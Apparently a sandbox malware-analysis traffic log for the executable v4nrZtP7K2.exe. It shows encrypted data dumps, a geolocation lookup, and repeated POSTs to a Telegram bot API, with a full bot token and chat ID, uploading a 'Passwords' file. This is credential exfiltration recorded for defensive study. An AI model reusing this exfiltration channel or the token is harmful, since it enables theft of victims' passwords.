                                                                                    2025-01-10 20:41:07 UTC4839INData Raw: a2 1f 34 9b 56 6e ca dd e9 c7 60 1b 3f 05 0e 90 25 6a 27 d3 f4 fb c1 5f 63 50 d8 1c 61 9d 00 54 c4 88 0b 24 d7 9f 87 b7 99 42 76 71 f9 c0 d7 c5 fe e2 97 9e 90 6e 2f 8b d0 07 a8 44 31 49 e6 c7 6c 8d 80 29 b3 ef 4a bb 1b 66 c4 b3 71 f3 9b 49 29 35 c6 f4 a8 91 db dd a9 1f d4 ed ad 5b 8a dc f4 b0 87 f4 d9 99 63 f1 71 31 e0 78 2c 7d 37 99 8c 55 e8 00 60 fd 36 9e db 37 9f 9a 89 71 7d ca f1 37 79 de ec b7 5f e9 10 b4 f6 26 28 e7 7c 36 c7 5c 8e f7 f7 72 de e7 d7 af 4b 04 81 e6 18 ac aa 01 b5 6e 22 f0 9d 2f 64 91 1c a6 4d 82 9e 70 5d e7 46 26 85 b6 ef ee 96 e2 5b 5b 01 da e6 3b 55 30 3b 4c 91 70 ad df d3 83 87 5c 7b ed e8 4f 22 a5 11 4d 20 7f ae 2b 13 f4 d5 57 19 ee bc 9b fe 3b d1 a3 12 47 79 06 a1 ae e2 46 7d 80 ed 60 de 36 2e 32 00 52 7a 32 e4 7f 33 50 e7 cd ec
                                                                                    Data Ascii: 4Vn`?%j'_cPaT$Bvqn/D1Il)JfqI)5[cq1x,}7U`67q}7y_&(|6\rKn"/dMp]F&[[;U0;Lp\{O"M +W;GyF}`6.2Rz23P
                                                                                    2025-01-10 20:41:07 UTC1322INData Raw: 16 21 0b 8a 50 28 80 6f 94 49 0b dc d2 3c f5 99 44 24 e8 1a 5a ac 2e e5 0d e5 e0 b7 6b 91 9a 2e e5 96 41 8c 6b cd 9a 5e 08 45 b1 b3 ee 68 be 17 e7 d1 d9 bb b8 76 8c d2 5f 0f 50 12 f4 99 6f 8a c4 0a ce 2d 65 62 4e d3 8e f1 d5 56 c9 89 5d f6 35 04 05 58 81 c1 62 60 ba 83 97 b6 4d 59 fd 05 72 cc f4 4d 4d 15 8c 1d 4f 79 89 a8 ef 92 1b 1c 41 82 14 5e ea 17 d6 ca 38 3b 08 03 e9 34 df dc 7e a3 50 94 5d c4 84 89 04 cb 7d 9c da 5b a7 38 be 1b 0d 9c d9 93 e2 51 9d c8 2e 75 d8 f3 4b 19 f3 25 50 24 f3 28 db c4 94 67 ed 0b 46 c0 52 0e f1 f0 25 b2 db 2d 90 29 8c 77 33 e6 24 6a 29 9d c8 91 a8 e0 aa b1 ed 17 5d d0 20 76 b0 ac f3 9a ad c9 f2 a3 a2 bd 29 42 d2 b3 05 ee 7d c7 67 e3 43 49 b0 5f 22 e2 03 f7 51 56 71 e8 a3 8b 97 68 b9 85 30 70 35 e2 bb b0 79 5f f7 f0 6f 9d e9
                                                                                    Data Ascii: !P(oI<D$Z.k.Ak^Ehv_Po-ebNV]5Xb`MYrMMOyA^8;4~P]}[8Q.uK%P$(gFR%-)w3$j)] v)B}gCI_"QVqh0p5y_o
                                                                                    2025-01-10 20:41:07 UTC1390INData Raw: ef 6c 06 6d 8c 67 a9 8a e1 dc f9 8c c0 d6 88 2d 66 fe 24 c8 ae b3 ed 23 da 1d 16 62 86 a3 1b 82 6d 54 ee 62 44 8c 21 f7 48 c7 2c 1f 57 47 a6 fa e5 ae 0e 9e 1b 6a f1 a3 9d dc 30 17 95 19 d8 33 40 19 ef 65 0e 68 3d 46 2c 48 10 e0 c0 df 3f 01 38 c2 df 28 44 fd ef e7 91 64 e9 64 c0 b3 dd d7 a8 93 80 1b da bc 37 2a 1a e7 01 dc 90 1e 7c 90 aa 9e 7d 1c d9 f2 2d 63 dc 57 b8 69 f9 af 43 83 25 e0 26 53 73 60 29 8c a6 7e 3b 91 f0 1d f9 55 97 cb 0d 39 ae a6 d8 03 68 6e 6a 5d 31 ae 84 19 26 fb 88 0e 8a e7 9e 74 54 e6 7b 7e de 4f 07 29 3c 0c 00 6a 7a 8a cc e3 f0 e9 8a 2c 98 f8 ef 98 2f b4 48 5c 65 d7 15 22 8c a5 14 a1 84 48 27 09 d1 b4 9e 7a 8f 55 d6 85 46 17 d1 79 54 dc ec 4d 75 45 f9 80 ef c7 33 32 16 5f f7 09 13 c0 97 a9 de 0a d4 25 cf 3b a8 ba 4d b8 4d f2 83 c7 05
                                                                                    Data Ascii: lmg-f$#bmTbD!H,WGj03@eh=F,H?8(Ddd7*|}-cWiC%&Ss`)~;U9hnj]1&tT{~O)<jz,/H\e"H'zUFyTMuE32_%;MM
                                                                                    2025-01-10 20:41:07 UTC1390INData Raw: bd d8 c0 5c c2 7a 18 62 15 ea 8d 02 57 03 73 17 bb 7a 7b e4 1b f6 07 7f b2 ae 46 ee d8 cd 08 6f d2 68 0d 4e f4 fa ff 23 b7 b4 a0 f8 c4 54 9e 68 2a 43 c7 dd 2a 86 bd 6a 4a 91 e6 6b 6e 9d af e8 47 a2 ae 99 55 15 b4 61 6a 73 30 dd 63 e5 ef c1 6e 37 74 09 9f c5 dd 2d b7 23 ca 86 d4 ab 73 b4 31 2c 95 e1 b6 93 c0 dc 53 1c df 95 11 13 cd 4b 68 93 55 da ed a9 52 40 0d 44 0b 98 6a a3 c8 12 ba d1 81 d6 f8 20 61 92 3f 41 b8 90 70 56 fd 38 61 08 ca 0a d5 67 a9 f8 5e fe a0 4d b1 e7 ec d5 c3 ab 36 37 9a d5 b4 47 66 f9 b3 f3 f4 fa 13 bc 7c 00 a6 25 cb d8 ff 1d 0b fe c6 58 4b 62 f9 18 43 05 e2 28 5a 4b 3a 18 1f ef b4 66 1f 77 f9 6f e4 78 d6 8e 9f 6d f4 92 cf d1 4f c0 b0 33 09 33 f7 77 9c 2c 9f bf df 86 52 9e 1b 07 44 e3 06 9b b1 6a c1 d4 bb d7 97 44 f4 af 6e ca d0 ab 40
                                                                                    Data Ascii: \zbWsz{FohN#Th*C*jJknGUajs0cn7t-#s1,SKhUR@Dj a?ApV8ag^M67Gf|%XKbC(ZK:fwoxmO33w,RDjDn@
                                                                                    2025-01-10 20:41:07 UTC1390INData Raw: a3 ad c8 9d 81 df c0 de ee af 28 46 fa 51 05 ee 66 c7 65 91 a1 52 b0 34 3a a6 03 dd 5a 5d 67 40 fa 8b 86 69 b7 fc 25 88 35 e6 cf 98 87 5e fe 87 45 98 f8 fc 48 fb 5b 3b bc d2 b5 0b 3a 6e 04 7a bd c6 21 d7 24 22 28 20 70 0b 1a 77 ae 71 27 9e 36 07 09 ec 82 99 cd 3c 86 89 ee a5 a7 cf 2a 8a d2 1a d5 d0 cd cd 07 f6 19 71 a2 a8 fd f7 64 ec 53 c3 93 f6 8e 73 8a 03 61 c6 cd 1c e3 21 63 e1 05 a6 eb 1b f4 cb 40 f5 3c 47 0d af 77 2a af e5 17 07 e7 df e0 f3 96 0d 75 56 17 0e 53 b7 3b e0 47 a3 01 6a 22 7a ab a8 8f e7 91 fe 8b bc 12 1f db a9 46 74 25 1f 1c c0 01 1a 73 0b 69 8d 6c 96 e9 36 73 53 dd fa d2 ec 56 8d 1a 19 d6 8c 76 b7 33 8e 35 11 19 04 fe 13 23 93 ca 6d ad 90 ba a5 9d b9 52 c4 4b c0 29 1f 96 a2 ea 77 27 7d 67 b5 73 47 7f 58 a5 93 8a 24 c8 e7 61 d5 0d 2c fe
                                                                                    Data Ascii: (FQfeR4:Z]g@i%5^EH[;:nz!$"( pwq'6<*qdSsa!c@<Gw*uVS;Gj"zFt%sil6sSVv35#mRK)w'}gsGX$a,
                                                                                    2025-01-10 20:41:07 UTC1390INData Raw: 51 64 4e 6f 1e 71 50 a0 63 1b 9a a5 1d 6b 9b a6 87 5a c1 5e 65 dd 23 c0 b3 0d 32 d1 a7 d7 31 49 aa e3 3c a7 70 cf 7b 77 d8 fe 74 60 68 0e ae 18 21 c8 20 ff 81 56 47 1b 23 90 68 55 ee 35 a2 4d be 87 ae 10 f6 8a 86 27 fe cb c5 97 59 d3 82 5d ed 5f dd 48 32 68 82 b4 20 7c 72 ab d8 5a 16 f6 66 56 5b 33 76 af f9 33 d6 15 7d 9a b4 08 70 e2 3a f2 a9 84 79 7a df 43 fd e0 9d 07 1a 7b d0 b5 3b 21 e6 4b 4d f8 a6 c4 4f d7 58 c2 c0 df ec 6f 64 ae e8 cb 70 b7 19 48 ef d3 75 fd 5d 84 fe 6b 62 97 14 fa 23 8d 48 7e 25 63 11 24 4e d6 cb 16 cb 93 28 0d 08 3d 96 8c f9 2a 4a 0f e4 d8 4a c0 29 52 88 06 f3 b8 41 f8 61 6d 48 9b fb 74 a7 28 90 88 ac 96 52 5b d5 80 96 b5 fb 83 ff 5c 21 2f 38 0c 61 23 c0 ed b0 c6 90 3a 33 69 bc 94 99 65 d5 67 bf bc 55 98 ea 79 43 16 fe b0 bb 83 5f
                                                                                    Data Ascii: QdNoqPckZ^e#21I<p{wt`h! VG#hU5M'Y]_H2h |rZfV[3v3}p:yzC{;!KMOXodpHu]kb#H~%c$N(=*JJ)RAamHt(R[\!/8a#:3iegUyC_
                                                                                    2025-01-10 20:41:07 UTC1390INData Raw: 62 1f b1 43 58 ec f5 18 24 dd f4 ab 3d 99 48 13 74 26 cc dd e4 46 e5 9e f7 82 67 3e 88 c4 25 77 44 1e 70 df d1 92 86 80 26 a2 cc 34 ad 33 c6 19 a4 79 e2 9e 26 76 35 b8 e6 b9 98 f7 3a ff 14 d2 8e be 73 0b dc df 9a 91 22 72 8a 66 ea 7c 19 fc 0b b0 61 37 9a 6f 80 e8 0a 75 94 78 98 a5 23 b7 26 8d 02 f6 d9 f4 3d 07 54 9e 55 50 e9 71 a4 b1 28 28 e7 7c 5e 18 5f 9f f6 ea 00 db e7 ad b9 72 83 a9 77 12 ba 5e 70 9a 76 2e 91 b9 35 29 8c 97 f6 70 82 9f 5f 63 d2 a0 32 8f a9 df cb 81 e1 f9 6f 1f da ce 29 55 30 e7 74 88 61 ad 0f 64 92 f5 6a 46 aa 98 ed 0d d1 93 48 82 50 b2 27 2f d4 d5 23 c8 52 1c 9b f4 22 c5 bf 6a 27 ec 06 a5 b5 fe 69 5c 16 ed 6a 54 39 50 12 04 52 7e 50 74 68 e5 49 f3 d4 95 7e c5 f0 86 d3 72 49 a5 f7 6c 4f 3d 80 57 a6 df d8 8a 3f da ae b6 2c 97 e6 91 a7
                                                                                    Data Ascii: bCX$=Ht&Fg>%wDp&43y&v5:s"rf|a7oux#&=TUPq((|^_rw^pv.5)p_c2o)U0tadjFHP'/#R"j'i\jT9PR~PthI~rIlO=W?,
                                                                                    2025-01-10 20:41:07 UTC1390INData Raw: 4a cc 22 a5 66 58 ad e4 6e 56 7e 4e ed 76 d8 56 ac 64 f3 e7 60 db bb cd 53 ea 74 eb 55 eb dd 62 78 27 2c bd 31 62 74 41 e6 d7 4d 17 fd 62 e6 9b 50 5f 30 20 9f 87 91 9d cf ad 71 6a a7 8f eb 06 30 0d ed 2d a0 a4 bf b8 39 90 bc a7 9f 2c ce 3c f3 40 b2 31 62 62 cc f9 20 2f 27 ce 90 11 77 bb 69 37 38 72 fd 77 36 fc 7e c5 b8 9d fa d4 f0 4f c8 43 ce 3c 98 8a ec a5 9a 43 bc 2c ac d0 f6 5a 6b 2b e9 3f 31 4b 4c 42 7f da 05 ad 85 5e ff 8f 50 2c ff 6a a3 4f 1a cb b5 f8 2c 36 f2 22 e7 4c 7d b4 4c 28 e6 33 08 8f dd 0c da f4 d9 17 97 02 02 9c c5 01 82 07 8c 03 66 2c 50 43 08 21 4c 08 41 01 1e 24 b8 ce 79 f3 0b f8 1d 33 59 2b f4 91 2b fc d6 7b 73 b4 80 ff 2b a9 c8 13 08 e3 18 95 0d b4 af c2 ed 78 1b 7e 13 0f 8f 84 67 13 4a 08 6f c2 de 36 12 e2 08 10 03 c2 e3 02 36 11 c3
                                                                                    Data Ascii: J"fXnV~NvVd`StUbx',1btAMbP_0 qj0-9,<@1bb /'wi78rw6~OC<C,Zk+?1KLB^P,jO,6"L}L(3f,PC!LA$y3Y++{s+x~gJo66
                                                                                    2025-01-10 20:41:07 UTC1390INData Raw: c5 dd e8 e4 a3 9f 29 92 f0 f2 79 47 7d bd 2f 96 67 37 4e 5d 0c 69 a3 95 86 da 35 c1 9d a4 2e 5e 41 0e 50 9b dd f3 86 fd 99 04 67 84 d9 25 d9 79 0c 16 f8 42 7a b3 2c 64 7c b7 03 df 0f c5 fd 4a 7a 19 36 cf 0f d6 d9 8f 92 ae dc 31 a7 69 8e bb 3b ba 98 4c 37 76 b0 3f fa 84 6a 84 6d 78 f9 01 3c f1 9d 28 b5 fb 1c 48 97 fb dd 1a ee e0 b5 66 0e f4 21 c0 8a 41 f8 06 1a e1 13 0e 48 bd 8a 38 1a c0 01 9a ed b6 6e bc 76 8a eb 5b 07 41 06 b6 07 73 10 b4 65 1b 09 65 64 4c d6 9d 8f bb c5 c9 8d 25 b6 3d 15 07 5c 96 c7 4a 69 b1 85 8e dd 58 5c d1 02 1f b2 b3 4d 47 39 30 ce 4f 7f 90 a1 fe 9b 0d 99 0a 91 1e 4b 9e 52 28 cb 21 18 4d 08 c5 28 fc 71 6d a6 4b 80 74 a6 d9 f2 4e c1 6c 91 da 1d a7 38 b2 08 08 9c db e8 81 71 9d e4 fa 26 d8 f9 49 20 a0 57 cc 32 ff 50 a7 17 85 61 c7 69
                                                                                    Data Ascii: )yG}/g7N]i5.^APg%yBz,d|Jz61i;L7v?jmx<(Hf!AH8nv[AseedL%=\JiX\MG90OKR(!M(qmKtNl8q&I W2Pai


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.949713104.21.48.14434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:41:11 UTC857INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:11 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 1856460
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2Bszv4c475BOFEEtS%2FWrxLokfIe5NVzg1MziwJYzA54jrmltHEAvdp%2FrsQo%2FChcjTy4iRb7eBStGYRj6gtJfhHPVxQaehCBWILKgHepZZOfShfQiee5g4hWauLkDcveWSr4ukiKv"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fff7c86bd9d42e9-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1627&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1764350&cwnd=240&unsent_bytes=0&cid=14683f272d0e6c53&ts=152&x=0"
                                                                                    2025-01-10 20:41:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.949740149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:17 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd318d38847f8a
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:41:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 64 33 38 38 34 37 66 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd318d38847f8aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:18 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:18 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:18 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44644,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541678,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.949757149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:20 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd31a7b8073b53
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:41:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 37 62 38 30 37 33 62 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd31a7b8073b53Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:20 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:20 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:20 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44646,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541680,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.949769149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:22 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd31bf58e38809
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:22 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 66 35 38 65 33 38 38 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd31bf58e38809Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:22 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:22 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:22 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44648,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541682,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.949782149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:23 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd31d58447bfff
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
